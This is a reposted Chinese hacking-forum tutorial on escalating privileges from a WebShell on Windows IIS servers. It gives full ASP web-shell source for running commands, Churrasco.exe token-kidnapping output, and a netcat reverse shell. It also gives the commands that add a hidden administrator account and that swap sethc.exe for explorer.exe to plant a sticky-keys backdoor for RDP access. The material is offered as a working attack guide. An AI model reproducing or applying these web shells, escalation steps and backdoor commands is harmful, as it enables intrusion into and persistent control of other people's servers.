說起WebShell提權的方法網上文章是多得所處可見!
那麼在這裡我寫點自己提權時所用到幾個小方法!也是自己實戰得來的經驗!
方法如有不對的請大家多多指點!
提權時要到的工具如下:cmd.exe Churrasco.exe nc.exe
以上就是今天主要講的!東西是死的!人是活的!就看你怎麼用了!
用以上工具先要確定SHELL裡 wscript.shell 命令行執行組件是否可用!如不能用用以下方法進行調用!如調用也不行!那麼就請你另想辦法!
代碼如下 :
<object runat=server id=oScriptlhn scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object>
<%if err then%>
<object runat=server id=oScriptlhn scope=page classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></object>
<%
end if %>
<form method="post">
<input type=text name="cmdx" size=60 value="C:\RECYCLER\cmd.exe"><br>
<input type=text name="cmd" size=60><br>
<input type=submit value="net user"></form>
<textarea readonly cols=80 rows=20>
<%On Error Resume Next
if request("cmdx")="C:\RECYCLER\cmd.exe" then
response.write oScriptlhn.exec("cmd.exe /c"&request("cmd")).stdout.readall
end if
response.write oScriptlhn.exec(request("cmdx")&" /c"&request("cmd")).stdout.readall
%>
</textarea>
將以上代碼保存為cmd.asp上傳到SHELL裡 再訪問這個CMD.asp如沒有出錯等就說明可以執行CMD命令!
下面先來將Churrasco.exe怎麼用才能更好的發揮它的作用!有很多朋友問我為什麼我上傳的Churrasco.exe執行命令時沒有出現命令成功 原因有幾種這裡我就不多說了!那麼這時我們要想到Churrasco.exe行命令時沒有出現命令成功但出現/churrasco/-->Current User: NETWORK SERVICE
/churrasco/-->Getting Rpcss PID ...
/churrasco/-->Found Rpcss PID: 696
/churrasco/-->Searching for Rpcss threads ...
/churrasco/-->Found Thread: 444
/churrasco/-->Thread not impersonating, looking for another thread...
/churrasco/-->Found Thread: 700
/churrasco/-->Thread not impersonating, looking for another thread...
/churrasco/-->Found Thread: 704
/churrasco/-->Thread not impersonating, looking for another thread...
/churrasco/-->Found Thread: 712
/churrasco/-->Thread impersonating, got NETWORK SERVICE Token: 0xf24
/churrasco/-->Getting SYSTEM token from Rpcss Service...
/churrasco/-->Found szywjs Token
/churrasco/-->Found SYSTEM token 0xf1c
/churrasco/-->Running command with SYSTEM Token...
直到這裡 沒有出現命令執行成功 那麼這時你千萬不要放棄!離成功加差一步!這裡你就用NC進行反彈一個CMDSHELL看下如果反彈回來的CMDSHELL權限很大的話那我就不用說了!如果說權限很小的這裡你也有很大的希望了!
在反彈回來的CMDSHELL裡執行 C:\RECYCLER\Churrasco.exe "net user iisuser iisuser /add」
C:\RECYCLER\Churrasco.exe "net localgroup administrators iisuser /add"
C:\RECYCLER\Churrasco.exe 這裡是你所傳到的目錄!這樣可以說90%的出現命令執行成功!這樣就可以進行3389連接了!
如果說這時沒有出現命令執行成功 下面我就再告訴你一種方法!
如下 依次執行:
attrib c:\windows\system32\sethc.exe -h -r -s
attrib c:\windows\system32\dllcache\sethc.exe -h -r -s
del c:\windows\system32\sethc.exe
copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe
attrib c:\windows\system32\sethc.exe +h +r +s
attrib c:\windows\system32\dllcache\sethc.exe +h +r +s
如果出現拒絕等錯誤 那就沒法了!如果說這台服務器先是被別人拿過了做了shift後門 那麼就是100%成功!本人親自用這方法成功替換過別人帶有密碼的SHIFT後門!
還有一點就是在webSHELL裡或CMDSHELL下也可以這樣執行!
C:\RECYCLER\Churrasco.exe "copy d:\windows\explorer.exe d:\windows\system32\sethc.exe"
C:\RECYCLER\Churrasco.exe "copy d:\windows\system32\sethc.exe d:\windows\system32\dllcache\sethc.exe "
還有就是attrib 加屬性等也可以這樣執行!還有一點忘了就是在反彈回來的CMDSHELL裡用這種方法也可以!
這樣就可以利用SHIft後門成功拿下服務器了!
註: 本文轉載自網路 非原創
轉載自 黑客擂台 原文
